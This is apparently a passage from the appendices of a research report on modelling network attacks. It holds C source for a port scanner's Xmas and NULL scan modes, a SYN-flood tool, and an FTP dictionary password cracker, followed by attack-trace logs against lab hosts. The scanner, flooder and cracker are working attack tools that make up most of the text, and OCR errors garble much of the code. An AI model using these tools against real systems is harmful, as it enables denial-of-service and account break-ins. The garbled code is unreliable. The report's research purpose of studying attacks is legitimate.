/*  sending  RST  ACK  packet  */ 
libnet_build_tcp(src_prt,  /*  source  TCP  port  */ 

cport,  /*  destination  TCP  port  */ 

seq_number+l,  /*  sequence  number  */ 
seq_number_from_server+l,  /*  acknowledgement  number  */ 
TH_RST+TH_ACK,  /*  control  flags  */ 

1024,  /*  window  size  */ 

0,  /*  urgent  pointer  */ 

NULL,  /*  payload  (none)  */ 

0,  /*  payload  length  */ 

packetRST  +  LIBNET_IP_H);  /*  packet  header  memory  */ 

/*  checksum  (TCP  header  only)  */ 

if(libnet_do_checksum(packetRST,  IPPROTO_TCP,  LIBNET_TCP_H)  ==  -1) 
libnet_error(LIBNET_ERR_FATAL,  "libnet_do_checksum  failed\n"); 
c  =  libnet_write_ip(network,  packetRST,  packet_size); 
if(c  <  packet_size)  { 

libnet_error(LN_ERR_WARNING,  "libnet_write_ip  only  wrote  %d  bytes\n",  c); 

}  else  ( 

printf("3.  %s.%d->%s.%d  TCP  RST  ACK  (seq:  %x  ack:  %x)\n\n",  source,  src_prt, 
destination,  cport,  seq_number+ 1 ,  seq_number_from_server+l); 


}  else  { 

printf("Error  reading  the  packets:  %s\n",  pcap_geterr(adhandle)); 
return  -1; 

) 
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} 


I 

} 

if(libnet_close_raw_sock(network)  ==  -1)  { 

libnet_error(LN_ERR_WARNING,  "libnet_close_raw_sock  couldn't  close  the  interface"); 

} 

libnet_destroy_packet(&packet); 
libnet_destroy_packet(&packetRST); 
break; 
case  'X': 

printf(" Starting  scanports  v.l.0\n"); 

printf("TCP  scanning  by  using  X-mas  tree  method.\n\n"); 

/*  TCP  FIN  packet  with  URG  PUSH  */ 
packet_size  =  LIBNET„IP_H  +  LIBNET_TCP_H; 
network  =  libnet_open_raw_sock(IPPROTO_RAW); 

iffnetwork  ==  -1)  libnet_error(LIBNET_ERR_FATAL,  "Can't  open  network.Vn"); 

libnet_init_packet(packet_size,  &packet); 

if((adhandle=  pcap_open_live(d->name,  //  name  of  the  device 

65536,  //  portion  of  the  packet  to  capture. 

//  65536  grants  that  the  whole  packet  will  be  captured  on  all  the  MACs. 
1,  //  promiscuous  mode 

1000,  //  read  timeout 

errbuf  //  error  buffer 

) )  ==  NULL)  { 

fprintf(stderr,"\nUnable  to  open  the  adapter.  %s  is  not  supported  by  WinPcap\n"); 

pcap_freealldevs(alldevs); 

return  -1; 

} 

/*  Ethernet?  */ 

if(pcap_datalink(adhandle)  !=  DLT_EN10MB)  { 

fprintf(stderr,"\nThis  program  works  only  on  Ethernet  networks.\n"); 

pcap_freealldevs(alldevs); 

return  -1; 


if(d->addresses  !=NULL) 

netmask=((struct  sockaddr_in  *)(d->addresses->netmask))->sin_addr.S_un.S_addr; 

else 

netmask=0xffffff ; 

printf("Selected  device:  %s\n",  d->description); 
pcap_freealldevs(alldevs); 


while  (libnet_plist_chain_next_pair(plist_p,  &bport,  &eport))  { 
while  (!(bport  >  eport)  &&  bport  !=  0)  { 
circle  =  1 ; 
eport  =  bport ++; 

if((packet  ==  NULL)  II  (packetRST  ==  NULL))  libnet_error(LIBNET_ERR_FATAL, 
"libnet_init_packet  failed\n"); 

/*  packet  construction  (IP  header)  */ 

libnet_build_ip(LIBNET_TCP_H,  /*  size  of  the  packet  sans  IP  header  */ 


IPTOS_LOWDELAY 
242, 

0, 

48, 

IPPROTO_TCP, 
src_ip, 
dst_ip, 

NULL, 

0, 

packet); 

/*  packet  construction  (TCP  header)  */ 
seq_number  =  libnet_get_prand(LIBNET_PRu32); 
ack_number  =  0; 


/*  IP  tos  */ 

/*  IP  ID  */ 

/*  frag  stuff  */ 

/*  TTL  */ 

/*  transport  protocol  */ 

/*  source  IP  */ 

/*  destination  IP  */ 

/*  payload  (none)  */ 

/*  payload  length  */ 

/*  packet  header  memory  */ 


libnet_build_tcp(src_prt, 

eport, 

seq_number. 


/*  source  TCP  port  */ 

/*  destination  TCP  port  */ 
/*  sequence  number  */ 
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ack_number,  /*  acknowledgement  number  */ 

TH_FIN +TH_URG+TH_PU SH,  /*  control  flags  */ 

1024,  /*  window  size  */ 

0,  /*  urgent  pointer  */ 

NULL,  /*  payload  (none)  */ 

0,  /*  payload  length  */ 

packet  +  LIBNET_IP_H);  /*  packet  header  memory  */ 

/*  checksum  (TCP  header  only)  */ 

if(libnet_do_checksum(packet,  IPPROTO_TCP,  LIBNET_TCP_H)  ==  -1) 
libnet_error(LIBNET_ERR_FATAL,  "libnet_do_checksum  failed\n"); 
j  =  sprintf(packet_filter,  "ip  and  tcp  and  src  host  %s  and  dst  host  %s  and  src  port  %d  and  dst  port  %d", 
destination,  source,  cport,  src_prt); 
if(pcap_compile(adhandle,  &fcode,  packet_filter,  1,  netmask)<0  ){ 

fprintf(stderr,"\nUnable  to  compile  the  packet  filter.  Check  the  syntax. \n"); 
pcap_freeallde  vs(allde  vs) ; 
return  -1; 

} 

if(pcap_setfilter( adhandle,  &fcode)<0)  { 

fprintf(stderr,"\nError  setting  the  filter.Xn"); 

pcap_freealldevs(alldevs); 

return  -1; 

} 

c  =  iibnet_write_ip(network,  packet,  packet_size); 
if(c  <  packet_size)  { 

libnet_error(LN_ERR_WARNING,  "libnet_write_ip  only  wrote  %d  bytes\n",  c); 

}  else  { 

printf("l.  %s.%d->%s.%d  TCP  FIN  PUSH  URG  (seq:  %x  ack:  %x)\n",  source,  src_prt, 
destination,  cport,  seq_number,  ack_number); 

} 

time(&localtime  1 ) ; 
while(circle){ 

res  =  pcap_read_ex(adhandle,  &header,  &pkt_data); 
iffres  ==  0)  { 

time( &localtime2) ; 
if  ((localtime2-localtimel)>timeout)  ( 

printf("port  %d  is  TIME  OUT!\n",  cport); 
break; 


continue; 

}  else  { 

if  (res  >  0)  { 
circle  =  0; 

ltime=localtime(&header->ts.tv_sec); 

strftimef  timestr,  sizeof  timestr,  ltime); 

iph  =  (struct  libnet_ip_hdr  *)  (pkt_data  + 

LIBNET_ETH_H) ; 
ip_len  =  (iph->ip_hl  &  Oxf)  *  4; 

tcph  =  (struct  libnet_tcp_hdr  *)  ((u_char*)iph  +  ip_len); 
seq_number_from_server  =  ntohl(tcph->th_seq); 
if  (tcph->th_flags  ==  (TH_RST+TH_ACK))  { 

printf("2.  %s.%d->%s.%d  TCP  RST  ACK  (seq:  %x  ack:  %x)  \nPort  %d  is  seems  to 
be  CLOSED.\n\n",  destination,  ntohs(tcph->th_sport),  source, 
ntohs(tcph->th_dport),  seq_number_from_server,  ntohl(tcph->th_ack),  cport); 

} 

}  else  { 

printf("Error  reading  the  packets:  %s\n",  pcap_geterr( adhandle)); 
return  -1; 


} 


} 


) 


if(libnet_close_raw_sock(network)  ==  -1)  { 

libnet_error(LN_ERR_WARNING,  "libnet_close_raw_sock  couldn't  close  the  interface"); 

} 

libnet_destroy_packet(&packet); 
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break; 
case  'N': 

printf(" Starting  scanports  v.l.0\n"); 
printfC'TCP  null-scanning.\n\n"); 

/*  construction  of  TCP-header  (all  flags  are  switched  off)  */ 

/*  packet  size:  no  data,  only  TCP  and  IP  headers  */ 
packet_size  =  LIBNET_IP_H  +  LIBNET_TCP_H; 
network  =  libnet_open_raw_sock(IPPROTO_RAW); 

if(network  ==  -1)  libnet_error(LIBNET_ERR_FATAL,  "Can't  open  network.Vn"); 

libnet_init_packet(packet_size,  &packet); 

if((adhandle=  pcap_open_live(d->name,  //  name  of  the  device 

65536,  //  portion  of  the  packet  to  capture. 

//  65536  grants  that  the  whole  packet  will  be  captured  on  all  the  MACs. 
1,  //  promiscuous  mode 

1000,  //  read  timeout 

errbuf  //  error  buffer 
) )  ==  NULL)  { 

fprintf(stderr,"\nUnable  to  open  the  adapter.  %s  is  not  supported  by  WinPcap\n"); 

pcap_freealldevs(alldevs); 

return  -1; 

} 

/*  Ethernet?  */ 

if(pcap_datalink(adhandle)  !=  DLT_EN10MB)  { 

fprintf(stderr,"\nThis  program  works  only  on  Ethernet  networks.\n"); 

pcap_freealldevs(alldevs); 

return  -1; 

} 

if(d->addresses  !=NULL) 

/*  get  a  network  mask  for  selected  device  (first  ip -address  for  this  device)  */ 
netmask=((struct  sockaddr_in  *)(d->addresses->netmask))->sin_addr.S_un.S_addr; 

else 

/*  else  network  class  is  C  */ 
netmask=Oxffffff ; 

printf("Selected  device:  %s\n",  d->description); 

/*  remove  adapters  list  */ 
pcap_freealldevs(alldevs); 

/*  circle  for  intervals  of  ports  */ 

while  (libnet_plist_chain_next_pair(plist_p,  &bport,  &eport))  { 
while  (!(bport  >  eport)  &&  bport  !=  0)  { 
circle  =  1 ; 

eport  =  bport++;  //  current  port 

if( (packet  ==  NULL)  II  (packetRST  ==  NULL))  libnet_error(LIBNET_ERR_FATAL, 
"libnet_init_packet  failed\n" ) ; 

/*  packet  construction  (IP  header)  */ 

libnet_build_ip(LIBNET_TCP_H,  /*  size  of  the  packet  sans  IP  header  */ 
IPTOS_LOWDELAY,  /*  IP  tos  */ 

242,  /*  IP  ID  */ 

0,  /*  frag  stuff  */ 

48,  /*  TTL  */ 

IPPROTO_TCP,  /*  transport  protocol  */ 
src_ip,  /*  source  IP  */ 

dst_ip,  /*  destination  IP  */ 

NULL,  /*  payload  (none)  */ 

0,  /*  payload  length  */ 

packet);  /*  packet  header  memory  */ 

/*  packet  construction  (TCP  header)  */ 

/*  random  sequence  number  */ 

seq_number  =  libnet_get_prand(LIBNET_PRu32); 

ack_number  =  0; 

libnet_build_tcp(src_prt,  /*  source  TCP  port  */ 

eport,  /*  destination  TCP  port  */ 

seq_number,  /*  sequence  number  */ 

ack_number,  /*  acknowledgement  number  */ 

0,  /*  control  flags  */ 

1024,  /*  window  size  */ 
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0,  /*  urgent  pointer  */ 

NULL,  /*  payload  (none)  */ 

0,  /*  payload  length  */ 

packet  +  LIBNET_IP_H);  /*  packet  header  memory  */ 

/*  checksum  (TCP  header)  */ 

if(libnet_do_checksum(packet,  IPPROTO_TCP,  LIBNET_TCP_H)  ==  -1) 
libnet_error(LIBNET_ERR_F ATAL,  "libnet_do_checksum  failed\n " ) ; 

/*  preparing  for  catch  */ 

/*  construct  a  filter  */ 

j  =  sprintf(packet_filter,  "ip  and  tcp  and  src  host  %s  and  dst  host  %s  and  src  port  %d  and  dst  port 
%d",  destination,  source,  cport,  src_prt); 

/*  compile  a  filter  */ 

if(pcap_compile(adhandle,  &fcode,  packet_filter,  1,  netmask)<0  ){ 

fprintf(stderr,"\nUnable  to  compile  the  packet  filter.  Check  the  syntax. \n"); 

/*  remove  adapters  list  */ 
pcap_freealldevs(alldevs); 
return  -1; 

} 

/*  set  a  filter  */ 

if(pcap_setfilter(adhandle,  &fcode)<0){ 

fprintf(stderr,"\nError  setting  the  filter.Xn"); 

/*  remove  adapters  list  */ 
pcap_freealldevs(alldevs); 
return  -1; 

} 

/*  sending  packet  */ 

c  =  iibnet_write_ip(network,  packet,  packet_size); 
if(c  <  packet_size)  { 

libnet_error(LN_ERR_WARNING,  "libnet_write_ip  only  wrote  %d  bytes\n",  c); 

}  else  { 

printf("l.  %s.%d->%s.%d  TCP  FIN  PUSH  URG  (seq:  %x  ack:  %x)\n",  source,  src_prt, 
destination,  cport,  seq_number,  ack_number); 

I 

/*  catch  a  packet  */ 

/*  remember  current  time  */ 
time(&localtime  1 ) ; 
while(circle){ 

res  =  pcap_read_ex(adhandle,  &header,  &pkt_data); 
if(res  ==  0)  { 

/*  timeout  */ 

time( &localtime2) ; 

if  ((localtime2-localtimel)>timeout)  ( 

printf("port  %d  is  TIME  OUT!\n",  cport); 
break; 

} 

continue; 

}  else  { 

if  (res  >  0)  { 
circle  =  0; 

/*  working  with  received  packet  */ 

/*  convert  timestamp  in  readable  format  */ 

ltime=localtime(&header->ts.tv_sec); 

strftime(  timestr,  sizeof  timestr,  ltime); 

/*  finding  a  start  point  of  IP  header  */ 
iph  =  (struct  libnet_ip_hdr  *)  (pkt_data  + 

LIBNET_ETH_H);  //  Ethernet  header  length 
/*  find  a  start  point  of  TCP  header  */ 
ip_len  =  (iph->ip_hl  &  Oxf)  *  4; 

tcph  =  (struct  libnet_tcp_hdr  *)  ((u_char*)iph  +  ip_len); 
seq_number_from_server  =  ntohl(tcph->th_seq); 

/*  RST  +  ACK  =  port  is  closed 
*  ack  number  <>  seq  number  —  not  our  packet!  */ 
if  (tcph->th_flags  ==  (TH_RST+TH_ACK))  { 

printf("2.  %s.%d->%s.%d  TCP  RST  ACK  (seq:  %x  ack:  %x)  \nPort  %d  is  seems  to 
be  CLOSED.\n\n",  destination,  ntohs(tcph->th_sport),  source, 
ntohs(tcph->th_dport),  seq_number_from_server,  ntohl(tcph->th_ack),  cport); 
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} 

}  else  { 

printf("Error  reading  the  packets:  %s\n",  pcap_geterr(adhandle)); 
return  -1; 


}  //  end  of  circle  by  ports  in  current  pair 
}  //  end  of  circle  by  pairs  of  ports 
/*  close  a  network  interface  */ 
if(libnet_close_raw_sock(network)  ==  -1)  { 

libnet_error(LN_ERR_WARNING,  "libnet_close_raw_sock  couldn't  close  the  interface"); 

} 

libnet_destroy_packet(&packet); 

break; 

default: 

usage(); 

break; 


return  0; 

} 

void  usage()  { 
printf("\n"); 

printf("scanports  v.l.0\n"); 
printf("scanports  [scan  type]  <arguments>\n"); 
printf("where  [scan  type]  is  one  of  the  following: \n"); 
printf("-sS  —  TCP  SYN  scan  (half  TCP-connection)\n"); 
printf("-sT  —  TCP  connect  scan\n"); 
printf("-sU  —  UDP  scan  (not  realized  yet)\n"); 
printf("-sF  -  TCP  FIN  scan\n"); 
printf("-sX  —  TCP  Xmax  Tree  scan\n"); 
printf("-sN  -  TCP  NULL  scan\n"); 
printf ( "  <arguments>\n " ) ; 

printf("<-i  number>  —  number  of  network  interface  (use  'Windump  -D'  for  listing  of  installed  interfaces)\n"); 

printf("<-h  ip.ip.ip.ip.port>  —  source  host\n"); 

printf("<-d  ip.ip.ip.ip>  —  destination  host\n"); 

printf("<-p  \"ports\">,  for  example  -p  \"  10,20- 100, 101  l\"\n"); 

printf("<-t  number>  —  timeout  for  waiting  of  reply  (in  seconds)\n"); 

exit(0); 

} 


A3 2.  Source  code  of  program  synflood.c 

/*  using  winpcap  library  version  3.0  alpha  4  */ 
#include  <pcap.h> 

/*  using  libnetnt  library  version  1.0.2f  */ 

#include  <libnet.h> 

#include  "getopt.h" 

#include  <string.h> 

/*  number  of  packets  to  send  */ 

#define  NUMBER_OF_PACKETS  10000 
#define  START_SOURCE_PORT  1025 


/*  prototypes  of  functions  */ 
void  usage(); 


int  main(int  argc,  char  **argv)  { 
int  inum  =  0;  /*  counter  */ 

int  i  =  0;  /*  counter  */ 

int  n  =  0;  /*  counter  */ 

int  network;  /*  identification  of  network  device  */ 

int  packet_size;  /*  size  of  our  packet  */ 
int  res  =  0;  /*  result  of  some  functions*/ 

u_long  seq_number;  /*  sequence  number  */ 
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u_long  ack_number;  /*  acknowledgement  number  */ 
char  *source;  /*  source  ip  address  */ 

char  *destination;  /*  destination  ip  address  */ 
u_long  src_ip=0,  dst_ip=0;  /*  source  and  destination  ip -addresses  in  network  format  */ 
u_short  dst_prt;  /*  destination  port  */ 
u_short  cport  =  START_SOURCE_PORT;  /*  current  source  port  */ 
char  c; 

u_char  *cp;  /*  for  address  resolution  */ 

/*  arena  */ 

struct  libnet_arena  arena,  *arena_p; 
u_char  *packets[NUMBER_OF_PACKETS] ; 

/*  get  a  parameters  */ 

while((c  =  getoptfargc,  argv,  "d:s:"))  !=  EOF)  { 
switch  (c)  { 
case  's': 

/*  source  ip  address  */ 

/*  TO_DO  verify  user  input  */ 
source  =  optarg; 

if((src_ip  =  libnet_name_resolve(optarg,  1))  ==  -1) 
libnet_error(LIBNET_ERR_FATAL,  "Bad  source  IP  address:  %s\n",  optarg); 
break; 
case 'd': 

/*  destination  ip  address  */ 

/*  TO_DO  verify  user  input  */ 

/*  we  are  except  'ip.ip.ip.ip.porf  */ 
if  ( ! (cp  =  strrchr(optarg, '.')))  { 
usage)); 

1 

*cp++  =  0; 

dst_prt  =  (u_short)atoi(cp); 
destination  =  optarg; 

if  (!(dst_ip  =  libnet_name_resolve(optarg,  LIBNET_RESOLVE))) 
libnet_error(LIBNET_ERR_FATAL,  "Bad  destination  IP  address:  %s\n",  optarg); 
break; 

1 

) 

/*  parameters  are  incorrect  */ 
if ( ! src _ ip  II  !dst_ip)  usage)); 

/*  initialize  random  function  */ 
if  (libnet_seed_prand))  ==  -1) 

libnet_error)LIBNET_ERR_FATAL,  "libnet_seed_prand  failed\n"); 

/*  identification  of  program  :)  */ 
printf("SYN  flooding  v.l.OVn"); 

/*  TCP  SYN  packet  construction  */ 

/*  size  of  our  packet:  no  data,  only  IP  and  TCP  headers  */ 
packet_size  =  LIBNET_IP_H  +  LIBNET_TCP_H; 

/*  number  of  packets  in  arena  =  NUMBER_OF_PACKETS  */ 
arena_p  =  &arena; 

if(libnet_init_packet_arena(&arena_p,  NUMBER_OF_PACKETS,  packet_size)  ==  -1){ 
printf ( 1 '  libnet_init_packet_arena  f ailed\n " ) ; 

)  else  { 

printf("Allocated  an  arena  of  %ld  bytes. ,\n",  LIB NET_GET_ AREN A_SIZE)arena)); 

) 

/*  initialization  of  network  interface  */ 

network  =  libnet_open_raw_sockfIPPROTO_RAW); 

if(network  ==  -1)  libnet_error(LIBNET_ERR_FATAL,  "Can't  open  network.\n"); 
for(n  =  0;  n  <  NUMBER_OF_PACKETS ;  n++,  cport++)  { 

printf("%ld  bytes  remaining  in  arena\n",  LIBNET_GET_ARENA_REMAINING_BYTES)arena)); 
packetsfn]  =  libnet_next_packet_from_arena(&arena_p,  packet_size); 
if  flpacketsfn]) 

{ 

libnet_error(LIBNET_ERR_WARNING,  "Arena  is  empty\n"); 
continue; 

} 
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/*  IP  header  construction  */ 
libnet_build_ip(LIBNET_TCP_H 
IPTOS_LOWDELAY, 

242, 

0, 

48, 

IPPROTO_TCP, 
src_ip, 
dst_ip, 

NULL, 

0, 

packets[n]); 

/*  TCP  header  construction  */ 

/*  get  a  random  sequence  number  */ 
seq_number  =  libnet_get_prand(LIBNET_PRu32); 
ack_number  =  0; 


/*  size  of  the  packet  sans  IP  header  */ 
/*  IP  tos  */ 

I*  IP  ID  */ 

/*  frag  stuff  */ 

/*  TTL  */ 

/*  transport  protocol  */ 

/*  source  IP  */ 

/*  destination  IP  */ 

/*  payload  (none)  */ 

/*  payload  length  */ 

/*  packet  header  memory  */ 


libnet_build_tcp(cport, 

dst_prt, 

seq_number, 

ack_number, 

TH_SYN, 

1024, 

0, 

NULL, 

0, 


/*  source  TCP  port  */ 

/*  destination  TCP  port  */ 

/*  sequence  number  */ 

/*  acknowledgement  number  */ 

/*  control  flags  */ 

/*  window  size  */ 

/*  urgent  pointer  */ 

/*  payload  (none)  */ 

/*  payload  length  */ 
packets[n]  +  LIBNET_IP_H);  /*  packet  header  memory  */ 

/*  checksum  for  TCP  header  */ 

if(libnet_do_checksum(packets  [n] ,  IPPROTO_TCP,  LIBNET_TCP_H)  ==  -1) 
libnet_error(LIBNET_ERR_FATAL,  "libnet_do_checksum  failed\n"); 

/*  injection  of  packet  */ 

c  =  libnet_write_ip(network,  packets  [n],  packet_size); 
if(c  <  packet_size){ 

libnet_error(LN_ERR_WARNING,  "libnet_write_ip  only  wrote  %d  bytes \n",  c); 

}  else  ( 

printf("packet  %d  of  %d,  wrote  all  %d  bytes\n",  n  +  1,  NUMBER_OF_PACKETS,  c); 

1 


} 

libnet_destroy_packet_arena(&arena_p); 
if(libnet_close_raw_sock( network)  ==  -1)  { 

libnet_error(LN_ERR_WARNING,  "libnet_close_raw_sock  couldn't  close  the  interface"); 

} 

return  0; 


void  usage))  { 
printf("\n"); 

printf("SYN  flooding  v.l.0\n"); 
printf("SYNflood  <arguments>\n"); 
printf(" where  <arguments>:\n"); 
printf("<-s  ip.ip.ip.ip>  —  source  host\n"); 
printf("<-d  ip.ip.ip.ip.port>  —  destination  host\n"); 
exit(0); 

1 


A3 3.  Source  code  of  program  ftpcrack.c 

/*  using  libnetnt  library  version  1.0.2f  */ 

#include  <libnet.h> 

#include  "getopt.h" 

#include  <string.h> 

#include  <stdio.h> 

#define  BUFFER_SIZE  1024 
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/*  prototypes  of  functions  */ 
void  usage(); 

int  getFTPcode  (LPSTR  reply,  int  nBufLen); 
int  sendFTPcommand  (SOCKET  s,  LPSTR  command,  int  length); 

int  main(int  argc,  char  **argv)  ( 
char  reply  [BT  JFFER_STZE] ; 
char  message[BUFFER_SIZE]; 
int  nTotalBytes  =  0; 
int  nNewBytes  =  1 ; 
u_char  *cp; 
char  *destination; 
u_long  dst_ip=0; 
u_short  dst_prt; 
char  c; 

struct  sockaddr_in  peer; 

WSADATA  WSAData; 
int  s; 

int  res  =  0; 
int  i  =  0; 

FILE  *passwdFile; 

/*  is  password  correct?  */ 
int  passwdFind  =  0; 

/*  next  password  from  file  */ 
char  nextpasswd[BUFFER_SIZE]; 

/*  if  server  is  closed  connection  this  flag  =  0  */ 
int  passwdSendAllow  =  1 ; 

/*  user's  login  name  */ 
char  *usemame; 

/*  file  with  dictionary  of  passwords  */ 
char  *filename; 

/*  current  code  of  message  from  ftp  server  */ 
int  curCode; 

/*  arguments  */ 

while((c  =  getopt(argc,  argv,  "d:u:f:"))  !=  EOF)  { 
switch  (c)  { 
case 'd': 

/*  destination  ip -address  */ 

/*  TO_DO  verify  user  input  */ 

/*  we  are  expected  ip.ip.ip.ip.port  */ 
if  (!(cp  =  strrchr(optarg, '.')))  ( 
usage!) ; 

1 

*cp++  =  0; 

dst_prt  =  (u_short)atoi(cp); 
destination  =  optarg; 

if  (!(dst_ip  =  libnet_name_resolve(optarg,  LIBNET_RESOLVE))) 

libnet_error(LIBNET_ERR_FATAL,  "Bad  destination  IP  address:  %s\n",  optarg); 
break; 
case  'u': 

username  =  optarg; 
break; 

case  'f : 

filename  =  optarg; 
break; 

} 

I 

/*  parameters  are  incorrect  */ 
if( !dst _ ip  II  Idst _ prt  II  lusemame)  usage)); 

if  ((passwdFile  =  fopen(filename,  "r"))  ==  NULL)  { 
printf("Cannot  open  password  dictionary  file !\n"); 
usage)); 

I 


/*  reply  from  server  */ 
/*  message  to  server  */ 


/*  destination  ip -address  */ 

/*  destination  ip -address  in  network  format  */ 
/*  destination  port  */ 


/*  socket  */ 

/*  result  of  some  functions  */ 
/*  counter  */ 
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/*  identification  of  program  */ 
printf("Starting  ftpcrack  v.l.0\n"); 

/*  preparing  for  using  WinSockets  */ 

res  =  WSAStartup((WORD)((l  «  8)  I  1),  (LPWSADATA)&WSAData); 
iffres  !=  0){ 

printf("WSAStartup()  error,  program  exits  now\n"); 
exit(O); 

} 

/*  where  we  want  to  connect?  */ 

/*  destination  ip -address  convert  from  Internet  standard  dotted  format  into  unsigned  long  binary  representation  */ 
peer.sin_family  =  AF_INET; 
peer.sin_port  =  htons(dst_prt); 
peer.sin_addr.s_addr  =  inet_addr(destination); 

while  (!(feof(passwdFile))  &&  IpasswdFind)  { 
printf("\nConnecting...\n"); 

/*  make  a  socket  */ 

s  =  socket! AF_INET,  SOCK_STREAM,  0); 
if(s  ==  INVALID_SOCKET)  { 
printf("Error  in  socket  call!\n"); 

WSACleanupO; 

exit(0); 

} 

/*  connect  to  destination  host  */ 

res  =  connect!  s,  (  struct  sockaddr  *  )&peer,  sizeof(  peer  ) ); 
if (res){ 

printf("Send:  connecting  to  %s.%d  Operation  FAILED!  (Port  is  seems  to  be  CLOSED)\n\n", 
destination,  ntohs(peer.sin_port)); 
exit(0); 
j  else  { 

printf("Send:  connecting  to  %s.%d\n",  destination,  ntohs(peer.sin_port)); 

} 

/*  receiving  reply  from  server  */ 
nNewBytes  =  recv(s,  reply,  sizeoffreply),  0); 
if  (nNewBytes  ==  SOCKET_ERROR)  { 
printf("Socket  Error!\n"); 
exit(0); 

I 

printf!"Reply:  "); 

for(i  =  0;  i  <  nNewBytes;  i++)  printf("%c",  reply [i] ); 

/*  if  server  is  ready...  */ 
if  (getFTPcode(reply,  nNewBytes)  ==  220)  { 

/*  user  name  */ 
strcpylmessage,  "USER  "); 
strcatfmessage,  username); 
strcatfmessage,  "  \r\n"); 
printf("Send:  %s",  message); 

if  (sendFTPcommand  (s,  (LPSTR)message,  strlen(message))  <  (strlen( message))) 
printff'Error  sending  command!\n"); 

/*  receiving  reply  from  server  */ 
nNewBytes  =  recv(s,  reply,  sizeof(reply),  0); 
if  (nNewBytes  ==  SOCKET_ERROR)  { 
printf("Socket  Error!\n"); 
exit(O); 

} 

printf(" Reply:  "); 

for(i  =  0;  i  <  nNewBytes;  i++)  printf("%c",  reply[i]); 

/*  Username  is  ok,  sending  password...  */ 
if  (getFTPcodelreply,  nNewBytes)  ==  331)  { 
passwdSendAllow  =  1 ; 
while  (passwdSendAllow)  ( 

if  (!(feof(passwdFile)))  fscanf(passwdFile,  "%s\n",  nextpasswd);  else  break; 
strcpy(message,  "PASS  "); 
strcat(message,  nextpasswd); 
strcatfmessage, "  \r\n"); 


187 


printf("Send:  %s",  message); 

if  (sendFTPcommand  (s,  (LPSTR)message,  strlen(message))  <  (strlen(message))) 
printf("Error  sending  command!\n"); 

/*  receiving  reply  from  server  */ 
nNewBytes  =  recv(s,  reply,  sizeof(reply),  0); 
if  (nNewBytes  ==  SOCKET_ERROR)  { 
printf("Socket  Error!\n"); 
exit(0); 

} 

printfC'Reply:  "); 

for(i  =  0;  i  <  nNewBytes;  i++)  printf("%c",  reply [i]); 
curCode  =  getFTPcode(reply,  nNewBytes); 
if  (curCode  ==  530)  { 

/*  password  incorrect  */ 
printf(  "Bad  password  !\n"); 
passwdSendAllow  =  0; 

}  else  if  (curCode  ==  230)  { 

/*  welcome  message  */ 
passwdFind  =  1 ; 

printf("SUCCESS!  Use  this  account  and  password  for  access  to  ftp-server:\n"); 
printf("USERNAME:  %s\nPASSWD:  %s\n",  username,  nextpasswd); 
exit(0); 

}  else  if  ((curCode  ==  231)  II  (curCode  ==  503))  { 

/*  some  unexpected  responses  from  server  */ 
passwdSendAllow  =  0; 

} 


}  /*  ending  "if  server  is  ready"  */ 
closesocket(s); 

I 

fclose  (passwdFile); 

WSACleanupO; 
return  0; 


void  usage!)  { 
printf("\n"); 

printf("ftpcrack  v.  1 ,0\n"); 
printf(  "ftpcrack  <arguments>\n" ) ; 
printf(" where  <arguments>:\n"); 
printf("<-d  ip.ip.ip.ip.port>  —  destination  host\n"); 
printf("<-u  username>  —  user's  login  name\n"); 
printf("<-f  filename>  —  filename  with  dictionary  of  passwords\n"); 
exit(0); 

} 

/*  function  return  a  ftp  code  of  reply  from  server,  for  example  "220",  what  means  that  server  is  ready  */ 
/*  arguments:  reply  from  server,  length  of  reply  */ 
int  getFTPcode  (LPSTR  reply,  int  nBufLen)  { 

LPSTR  ftpReply; 
int  i  =  0; 

ftpReply  =  reply; 

while  ((*(ftpReply+3)  ==  II  ((*(ftpReply)=='  ,)&&(*(ftpReply+l)=='  ’)&&(*(ftpReply+2)==' ')))  { 
/*  find  a  ending  of  reply  string  */ 

for  (i=0;*ftpReply!=0x0a  &&  *ftpReply  &&  i<nBufLen-3;  ftpReply++,i++); 
ftpReply++;  /*  going  to  begining  of  reply  code  */ 
if  (!(*ftpReply))  /*  no  code!  */ 
return  0; 

I 

return  atoi(ftpReply); 

} 

/*  function  send  FTP  command  to  server  */ 

/*  arguments:  network  socket,  ftp  command  (for  example  "USER  username\r\n"),  length  of  command  */ 
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int  sendFTPcommand  (SOCKET  s,  LPSTR  command,  int  length)  { 
int  nBytesSent  =  0; 
int  nRet  =  0; 

while  (nBytesSent  <  length)  { 

nRet  =  send(s,  command,  length-nBytesSent,  0); 
if  (nRet  ==  SOCKET_ERROR)  { 
printf("Socket  Error!\n"); 
exit(O); 

) 

nBytesSent  +=  nRet; 

I 

return  nBytesSent; 
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Appendix  4.  Logs  of  attack  traces  and  results 

A4.1.  Logs  of  attack  traces  on  macro -level 

A4.1.1.  Total  log  of  the  intention  ABE  (“Applications  and  Banners  Enumeratiori’)  realization 

Conditions  for  the  realization  of  malefactor’s  intention  ABE: 

•  protection  degree  of  network  firewall  is  “Strong”  (1); 

•  an  attacked  host  firewall  is  absent  (3). 

The  attributes  of  the  logs  are  as  follows  (they  correspond  to  the  attributes  of  the  ontology  notions 
Log  and  LogResult): 

•  ID -a  unique  number  identifying  the  state  of  a  state  machine ; 

•  A-  state  machine  name ; 

•  S  -  the  used  state  of  a  state  machine ; 

•  Description  -  description  of  the  state  machine’s  state  (except  for  the  intermediate  states);  if 
the  state  is  terminal,  then  the  action  description  is  specified;  if  it  is  non-terminal,  then  the 
description  of  attack  class  is  recorded; 

•  ResultComment  -  the  description  of  the  result  that  can  be  obtained  in  the  used  state  S  (if  that 
state  is  terminal); 

•  Result  -  information  received  from  the  host  or  message  about  the  successful  attack  in  the 
terminal  state; 

•  FailResult  -  information  received  from  the  attacked  network  in  case  the  attacked  is  blocked 
by  a  firewall. 

Total  log  of  the  intention  ABE  realization  is  as  follows: 


mm 

A 

S 

Description 

ResultComment 

Result  |  FailResult 

i 

ABE 

FP 

Connection  to  FTP  server  and 
examination  of  the  prompt  header 

[192.168.130.1351 
Running  Applications 

2 

ABE 

FP 

Connection  to  FTP  server  and 
examination  of  the  prompt  header 

['192.168.130.138] 
Running  Applications 

3 

ABE 

FP 

Connection  to  FTP  server  and 
examination  of  the  prompt  header 

[192.168.130.139] 
Running  Applications 

MS  IIS 

3 

ABE 

FP 

Connection  to  FTP  server  and 
examination  of  the  prompt  header 

[192.168.130.139] 
Running  Applications 

FTP -server 

3 

ABE 

FP 

Connection  to  FTP  server  and 
examination  of  the  prompt  header 

[192.168.130.1391 
Running  Applications 

Mail- server 

3 

ABE 

FP 

Connection  to  FTP  server  and 
examination  of  the  prompt  header 

[192.168.130.139] 
